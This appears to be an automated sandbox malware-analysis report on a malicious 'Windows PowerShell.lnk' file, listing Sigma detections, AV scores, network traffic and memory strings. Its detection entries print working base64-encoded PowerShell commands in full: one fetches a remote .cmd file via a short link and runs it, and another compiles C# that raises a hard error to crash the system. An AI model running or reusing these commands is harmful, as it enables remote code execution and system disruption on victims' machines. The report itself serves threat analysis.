QAYQA9AEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABzACAALQBMAGEAbgBnAHUAYQBnAGUAIABDAFMAaABhAHIAcAAgAC0AUAB
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -e JABzAD0AJwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ASQBPADsAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABYAHsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAFIAdABsAEEAZABqAHUAcwB0AFAAcgBpAHYAaQBsAGUAZwBlACgAaQBuAHQAIABwACwAYgBvAG8AbAAgAGUALABiAG8AbwBsACAAYwAsAG8AdQB0ACAAYgBvAG8AbAAgAG8AKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABOAHQAUgBhAGkAcwBlAEgAYQByAGQARQByAHIAbwByACgAdQBpAG4AdAAgAGUALAB1AGkAbgB0ACAAbgAsAHUAaQBuAHQAIAB1ACwASQBuAHQAUAB0AHIAIABwACwAdQBpAG4AdAAgAHYALABvAHUAdAAgAHUAaQBuAHQAIAByACkAOwBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAdQBuAHMAYQBmAGUAIABzAHQAcgBpAG4AZwAgAFMAaABvAHQAKAApAHsAYgBvAG8AbAAgAG8AOwB1AGkAbgB0ACAAcgA7AFIAdABsAEEAZABqAHUAcwB0AFAAcgBpAHYAaQBsAGUAZwBlACgAMQA5ACwAdAByAHUAZQAsAGYAYQBsAHMAZQAsAG8AdQB0ACAAbwApADsATgB0AFIAYQBpAHMAZQBIAGEAcgBkAEUAcgByAG8AcgAoADAAeABjADAAMAAwADAAMAAyADIALAAwACwAMAAsAEkAbgB0AFAAdAByAC4AWgBlAHIAbwAsADYALABvAHUAdAAgAHIAKQA7AGIAeQB0AGUAWwBdAGMAPQBDAG8AbgB2AGUAcgB0AC4ARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAUgBOAG8AOABUAFoANQA2AFIAdgArAEUAeQBaAFcANwAzAE4AbwBjAEYATwBJAGkATgBGAGYATAA0ADUAdABYAHcAMgA0AFUAbwBnAEcAZABIAGsAcwB3AGUAYQAvAFcAaABuAE4AaABDAE4AdwBqAFEAbgAxAGEAVwBqAGYAdwAiACkAOwBiAHkAdABlAFsAXQBrAD0AQwBvAG4AdgBlAHIAdAAuAEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAC8AYQAxAFkAKwBmAHMAcABxAC8ATgB3AGwAYwBQAHcAcABhAFQAMwBpAHIAWQAyAGgAYwBFAHkAdABrAHQAdQBIADcATABzAFkAKwBOAGwATABlAHcAPQAiACkAOwBiAHkAdABlAFsAXQBpAD0AQwBvAG4AdgBlAHIAdAAuAEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiADkAcwBYAEcAbQBLADQAcQA5AEwAZABZAEYAZABPAHAANABUAFMAcwBRAHcAPQA9ACIAKQA7AHUAcwBpAG4AZwAoAEEAZQBzACAAYQA9AEEAZQBzAC4AQwByAGUAYQB0AGUAKAApACkAewBhAC4ASwBlAHkAPQBrADsAYQAuAEkAVgA9AGkAOwBJAEMAcgB5AHAAdABvAFQAcgBhAG4AcwBmAG8AcgBtACAAZAA9AGEALgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoAGEALgBLAGUAeQAsAGEALgBJAFYAKQA7AHUAcwBpAG4AZwAoAHYAYQByACAAbQA9AG4AZQB3ACAATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKABjACkAKQB1AHMAaQBuAGcAKAB2AGEAcgAgAHkAPQBuAGUAdwAgAEMAcgB5AHAAdABvAFMAdAByAGUAYQBtACgAbQAsAGQALABDAHIAeQBwAHQAbwBTAHQAcgBlAGEAbQBNAG8AZABlAC4AUgBlAGEAZAApACkAdQBzAGkAbgBnACgAdgBhAHIAIABzAD0AbgBlAHcAIABTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAHkAKQApAHsAcgBlAHQAdQByAG4AIABzAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQB9AH0AfQAnADsAJABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AQwBvAGQAZQBEAG8AbQAuAEMAbwBtAHAAaQBsAGUAcgAuAEMAbwBtAHAAaQBsAGUAcgBQAGEAcgBhAG0AZQB0AGUAcgBzADsAJABjAC4AQwBvAG0AcABpAGwAZQByAE8AcAB0AGkAbwBuAHMAPQAnAC8AdQBuAHMAYQBmAGUAJwA7ACQAYQA9AEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABzACAALQBMAGEAbgBnAHUAYQBnAGUAIABDAFMAaABhAHIAcAAgAC0AUAB
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell -e JABzAD0AJwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ASQBPADsAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABYAHsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAFIAdABsAEEAZABqAHUAcwB0AFAAcgBpAHYAaQBsAGUAZwBlACgAaQBuAHQAIABwACwAYgBvAG8AbAAgAGUALABiAG8AbwBsACAAYwAsAG8AdQB0ACAAYgBvAG8AbAAgAG8AKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABOAHQAUgBhAGkAcwBlAEgAYQByAGQARQByAHIAbwByACgAdQBpAG4AdAAgAGUALAB1AGkAbgB0ACAAbgAsAHUAaQBuAHQAIAB1ACwASQBuAHQAUAB0AHIAIABwACwAdQBpAG4AdAAgAHYALABvAHUAdAAgAHUAaQBuAHQAIAByACkAOwBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAdQBuAHMAYQBmAGUAIABzAHQAcgBpAG4AZwAgAFMAaABvAHQAKAApAHsAYgBvAG8AbAAgAG8AOwB1AGkAbgB0ACAAcgA7AFIAdABsAEEAZABqAHUAcwB0AFAAcgBpAHYAaQBsAGUAZwBlACgAMQA5ACwAdAByAHUAZQAsAGYAYQBsAHMAZQAsAG8AdQB0ACAAbwApADsATgB0AFIAYQBpAHMAZQBIAGEAcgBkAEUAcgByAG8AcgAoADAAeABjADAAMAAwADAAMAAyADIALAAwACwAMAAsAEkAbgB0AFAAdAByAC4AWgBlAHIAbwAsADYALABvAHUAdAAgAHIAKQA7AGIAeQB0AGUAWwBdAGMAPQBDAG8AbgB2AGUAcgB0AC4ARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAUgBOAG8AOABUAFoANQA2AFIAdgArAEUAeQBaAFcANwAzAE4AbwBjAEYATwBJAGkATgBGAGYATAA0ADUAdABYAHcAMgA0AFUAbwBnAEcAZABIAGsAcwB3AGUAYQAvAFcAaABuAE4AaABDAE4AdwBqAFEAbgAxAGEAVwBqAGYAdwAiACkAOwBiAHkAdABlAFsAXQBrAD0AQwBvAG4AdgBlAHIAdAAuAEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAC8AYQAxAFkAKwBmAHMAcABxAC8ATgB3AGwAYwBQAHcAcABhAFQAMwBpAHIAWQAyAGgAYwBFAHkAdABrAHQAdQBIADcATABzAFkAKwBOAGwATABlAHcAPQAiACkAOwBiAHkAdABlAFsAXQBpAD0AQwBvAG4AdgBlAHIAdAAuAEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiADkAcwBYAEcAbQBLADQAcQA5AEwAZABZAEYAZABPAHAANABUAFMAcwBRAHcAPQA9ACIAKQA7AHUAcwBpAG4AZwAoAEEAZQBzACAAYQA9AEEAZQBzAC4AQwByAGUAYQB0AGUAKAApACkAewBhAC4ASwBlAHkAPQBrADsAYQAuAEkAVgA9AGkAOwBJAEMAcgB5AHAAdABvAFQAcgBhAG4AcwBmAG8AcgBtACAAZAA9AGEALgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoAGEALgBLAGUAeQAsAGEALgBJAFYAKQA7AHUAcwBpAG4AZwAoAHYAYQByACAAbQA9AG4AZQB3ACAATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKABjACkAKQB1AHMAaQBuAGcAKAB2AGEAcgAgAHkAPQBuAGUAdwAgAEMAcgB5AHAAdABvAFMAdAByAGUAYQBtACgAbQAsAGQALABDAHIA
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3468, TargetFilename: C:\Users\user\AppData\Local\Temp\.cmd
Sigma detected: Suspicious Execution of Powershell with Base64
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e aQB3AHIAIABpAHMALgBnAGQALwBqAHcAcgA3AEoARAAgAC0AbwAgACQAZQBuAHYAOgBUAE0AUAAvAC4AYwBtAGQAOwAmACAAJABlAG4AdgA6AFQATQBQAC8ALgBjAG0AZAA=, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e aQB3AHIAIABpAHMALgBnAGQALwBqAHcAcgA3AEoARAAgAC0AbwAgACQAZQBuAHYAOgBUAE0AUAAvAC4AYwBtAGQAOwAmACAAJABlAG4AdgA6AFQATQBQAC8ALgBjAG0AZAA=, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e aQB3AHIAIABpAHMALgBnAGQALwBqAHcAcgA3AEoARAAgAC0AbwAgACQAZQBuAHYAOgBUAE0AUAAvAC4AYwBtAGQAOwAmACAAJABlAG4AdgA6AFQATQBQAC8ALgBjAG0AZAA=, ProcessId: 3468, ProcessName: powershell.exe
Sigma detected: Dynamic CSharp Compile Artefact
Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6196, TargetFilename: C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.cmdline
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e aQB3AHIAIABpAHMALgBnAGQALwBqAHcAcgA3AEoARAAgAC0AbwAgACQAZQBuAHYAOgBUAE0AUAAvAC4AYwBtAGQAOwAmACAAJABlAG4AdgA6AFQATQBQAC8ALgBjAG0AZAA=, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e aQB3AHIAIABpAHMALgBnAGQALwBqAHcAcgA3AEoARAAgAC0AbwAgACQAZQBuAHYAOgBUAE0AUAAvAC4AYwBtAGQAOwAmACAAJABlAG4AdgA6AFQATQBQAC8ALgBjAG0AZAA=, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e aQB3AHIAIABpAHMALgBnAGQALwBqAHcAcgA3AEoARAAgAC0AbwAgACQAZQBuAHYAOgBUAE0AUAAvAC4AYwBtAGQAOwAmACAAJABlAG4AdgA6AFQATQBQAC8ALgBjAG0AZAA=, ProcessId: 3468, ProcessName: powershell.exe

Data Obfuscation

barindex
Sigma detected: Dot net compiler compiles file from suspicious location
Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell -e JABzAD0AJwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ASQBPADsAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABYAHsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAFIAdABsAEEAZABqAHUAcwB0AFAAcgBpAHYAaQBsAGUAZwBlACgAaQBuAHQAIABwACwAYgBvAG8AbAAgAGUALABiAG8AbwBsACAAYwAsAG8AdQB0ACAAYgBvAG8AbAAgAG8AKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABOAHQAUgBhAGkAcwBlAEgAYQByAGQARQByAHIAbwByACgAdQBpAG4AdAAgAGUALAB1AGkAbgB0ACAAbgAsAHUAaQBuAHQAIAB1ACwASQBuAHQAUAB0AHIAIABwACwAdQBpAG4AdAAgAHYALABvAHUAdAAgAHUAaQBuAHQAIAByACkAOwBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAdQBuAHMAYQBmAGUAIABzAHQAcgBpAG4AZwAgAFMAaABvAHQAKAApAHsAYgBvAG8AbAAgAG8AOwB1AGkAbgB0ACAAcgA7AFIAdABsAEEAZABqAHUAcwB0AFAAcgBpAHYAaQBsAGUAZwBlACgAMQA5ACwAdAByAHUAZQAsAGYAYQBsAHMAZQAsAG8AdQB0ACAAbwApADsATgB0AFIAYQBpAHMAZQBIAGEAcgBkAEUAcgByAG8AcgAoADAAeABjADAAMAAwADAAMAAyADIALAAwACwAMAAsAEkAbgB0AFAAdAByAC4AWgBlAHIAbwAsADYALABvAHUAdAAgAHIAKQA7AGIAeQB0AGUAWwBdAGMAPQBDAG8AbgB2AGUAcgB0AC4ARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAUgBOAG8AOABUAFoANQA2AFIAdgArAEUAeQBaAFcANwAzAE4AbwBjAEYATwBJAGkATgBGAGYATAA0ADUAdABYAHcAMgA0AFUAbwBnAEcAZABIAGsAcwB3AGUAYQAvAFcAaABuAE4AaABDAE4AdwBqAFEAbgAxAGEAVwBqAGYAdwAiACkAOwBiAHkAdABlAFsAXQBrAD0AQwBvAG4AdgBlAHIAdAAuAEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAC8AYQAxAFkAKwBmAHMAcABxAC8ATgB3AGwAYwBQAHcAcABhAFQAMwBpAHIAWQAyAGgAYwBFAHkAdABrAHQAdQBIADcATABzAFkAKwBOAGwATABlAHcAPQAiACkAOwBiAHkAdABlAFsAXQBpAD0AQwBvAG4AdgBlAHIAdAAuAEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiADkAcwBYAEcAbQBLADQAcQA5AEwAZABZAEYAZABPAHAANABUAFMAcwBRAHcAPQA9ACIAKQA7AHUAcwBpAG4AZwAoAEEAZQBzACAAYQA9AEEAZQBzAC4AQwByAGUAYQB0AGUAKAApACkAewBhAC4ASwBlAHkAPQBrADsAYQAuAEkAVgA9AGkAOwBJAEMAcgB5AHAAdABvAFQAcgBhAG4AcwBmAG8AcgBtACAAZAA9AGEALgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoAGEALgBLAGUAeQAsAGEALgBJAFYAKQA7AHUAcwBpAG4AZwAoAHYAYQByACAAbQA9AG4AZQB3ACAATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKABjACkAKQB1AHMAaQBuAGcAKAB2AGEAcgAgAHkAPQBuAGUAdwAgAEMAcgB5AHAAdABvAFMAdAByAGUAYQBtACgAbQAsAGQALABDAHIA

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: Windows PowerShell.lnkReversingLabs: Detection: 13%
Source: Windows PowerShell.lnkVirustotal: Detection: 19%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
Machine Learning detection for sample
Source: Windows PowerShell.lnkJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 104.25.234.53:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: Binary string: :C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.pdb source: powershell.exe, 0000004B.00000002.2248209888.000002145EE74000.00000004.00000800.00020000.00000000.sdmp
Source: unknownDNS query: name: is.gd
Source: Joe Sandbox ViewIP Address: 104.25.234.53 104.25.234.53
Source: Joe Sandbox ViewIP Address: 140.82.121.4 140.82.121.4
Source: Joe Sandbox ViewIP Address: 185.199.111.133 185.199.111.133
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /jwr7JD HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: is.gdCookie: __cf_bm=Tayr4UKOTuOlJGv6OCIoBHJ4cmL2nzXhL5zeIMsr6ko-1728132689-1.0.1.1-qS4.lVj4h4RY.OQgdrWtfq9Y9QXr6oRaUPFcGg14gZ9m0vnqmc5ybvfiyNPGD4qoteXBF8BfZ6EOvBvFhfIOEQConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /user-attachments/files/17251016/powershell.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /github-production-repository-file-5c1aeb/151309588/17251016?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20241005%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241005T125131Z&X-Amz-Expires=300&X-Amz-Signature=bd113b24a947a7e5cf396cce6dbfa45a934e7b48cceea28c8f3b3a7c39af830c&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3Bfilename%3Dpowershell.zip&response-content-type=application%2Fx-zip-compressed HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /jwr7JD HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: is.gdConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /jwr7JD HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: is.gdCookie: __cf_bm=Tayr4UKOTuOlJGv6OCIoBHJ4cmL2nzXhL5zeIMsr6ko-1728132689-1.0.1.1-qS4.lVj4h4RY.OQgdrWtfq9Y9QXr6oRaUPFcGg14gZ9m0vnqmc5ybvfiyNPGD4qoteXBF8BfZ6EOvBvFhfIOEQConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /user-attachments/files/17251016/powershell.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /github-production-repository-file-5c1aeb/151309588/17251016?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20241005%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241005T125131Z&X-Amz-Expires=300&X-Amz-Signature=bd113b24a947a7e5cf396cce6dbfa45a934e7b48cceea28c8f3b3a7c39af830c&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3Bfilename%3Dpowershell.zip&response-content-type=application%2Fx-zip-compressed HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /jwr7JD HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: is.gdConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: is.gd
Source: global trafficDNS traffic detected: DNS query: github.com
Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
Source: powershell.exe, 0000004B.00000002.2267603715.000002146D8BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004B.00000002.2267603715.000002146D9F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004B.00000002.2248209888.000002145F17E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000004B.00000002.2248209888.000002145DA74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004B.00000002.2248209888.000002145EEEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000004B.00000002.2248209888.000002145D841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000004B.00000002.2248209888.000002145EEEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000004B.00000002.2248209888.000002145DA74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004B.00000002.2248209888.000002145EEEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000004B.00000002.2248209888.000002145D841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000004B.00000002.2248209888.000002145F17E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000004B.00000002.2248209888.000002145F17E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000004B.00000002.2248209888.000002145F17E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000004B.00000002.2248209888.000002145DA74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004B.00000002.2248209888.000002145EEEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000004B.00000002.2248209888.000002145E474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 0000004B.00000002.2267603715.000002146D8BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004B.00000002.2267603715.000002146D9F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004B.00000002.2248209888.000002145F17E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000004B.00000002.2248209888.000002145EEEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 0000004B.00000002.2248209888.000002145EEEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownHTTPS traffic detected: 104.25.234.53:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.6:49714 version: TLS 1.2

E-Banking Fraud

barindex
Malicious encrypted Powershell command line found
